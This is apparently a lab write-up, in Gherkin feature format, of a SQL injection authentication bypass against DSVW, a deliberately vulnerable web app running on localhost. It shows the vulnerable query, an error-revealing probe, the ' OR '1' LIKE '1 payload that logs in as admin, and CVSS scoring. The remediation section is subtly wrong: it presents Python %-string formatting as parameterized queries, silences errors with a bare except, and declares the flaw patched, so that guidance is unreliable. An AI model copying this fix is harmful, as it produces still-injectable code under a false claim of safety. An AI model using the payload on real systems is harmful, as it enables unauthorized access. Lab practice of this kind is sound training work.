## Version 1.4.1
## language: en

Feature:
  TOE:
    dsvw
  Category:
    UNION SQL Injection
  Location:
    http://127.0.0.1:65412/login/ - username (field) - password - (field)
  CWE:
    CWE-89: https://cwe.mitre.org/data/definitions/89.html
    CWE-564: https://cwe.mitre.org/data/definitions/564.html
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Login with the admin account
  Recommendation:
    Use parameterized queries
  Background:
    Hacker's software:
    | <Software name>                  | <Version>     |
    | Ubuntu                           | 19.04         |
    | Google Chrome                    | 75.0.3770.100 |
    | Sqlmap                           | 1.3.4         |
    | Burp                             | 2.1           |
  TOE information:
    Given I am accessing the site http://127.0.0.1:65412/
    And the server is running BaseHTTP version 0.3
    And Python version 2.7.16
    And SQLite version 3

  Scenario: Normal use case
    When I make the next request:
    """
    GET http://127.0.0.1:65412/login?username=admin&password=1234 HTTP/1.1
    """
    Then the site returns:
    """
    The username and/or password is incorrect
    """

  Scenario: Static detection
    When I look at the code of file DSVW\dsvw.py:
    """
    194 cursor.execute("SELECT * FROM users WHERE username='" + re.sub(r"[^\w]"
     , "", params.get("username",
    195    "")) + "' AND password='" + params.get(
    196                "password", "") + "'")
    """
    Then I concluded that insecure queries are made

  Scenario: Dynamic detection
    When I see how the requests are made:
    """
    GET http://127.0.0.1:65412/login?username=admin&password=1234 HTTP/1.1
    """
    Then the user and password parameters are passed through the url
    When I make the next request:
    """
    GET http://127.0.0.1:65412/login?username='&password=' HTTP/1.1
    """
    Then the site return:
    """
    Traceback (most recent call last):
        File "dsvw.py", line 196, in do_GET
            "password", "") + "'")
    OperationalError: unrecognized token: "'''"
    """
    Then I can conclude that id parameter is a possible attack vector

  Scenario: Exploitation
    When I make the next request:
    """
    GET http://127.0.0.1:65412/login?username=admin&password=' OR '1'
     LIKE '1 HTTP/1.1
    """
    Then the site returns:
    """
    Welcome admin
    """
    Then I can conclude that the vulnerability has been exploited

  Scenario: Remediation
    When I making queries, using parameterized queries:
    """
    194 username = params.get("username","")
    195 password = params.get("password", "")
    196 try:
    197  cursor.execute("SELECT * FROM users WHERE username = %s AND
    198   password = %s ;" % (username, password,))
    199 except:
    200  pass
    """
    When I make the next request:
    """
    GET http://127.0.0.1:65412/login?username=admin&password=' OR '1'
     LIKE '1 HTTP/1.1
    """
    Then the site returns:
    """
    The username and/or password is incorrect
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.3/10 (Medium) - E:H/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    5.6/10 (Medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-08-01
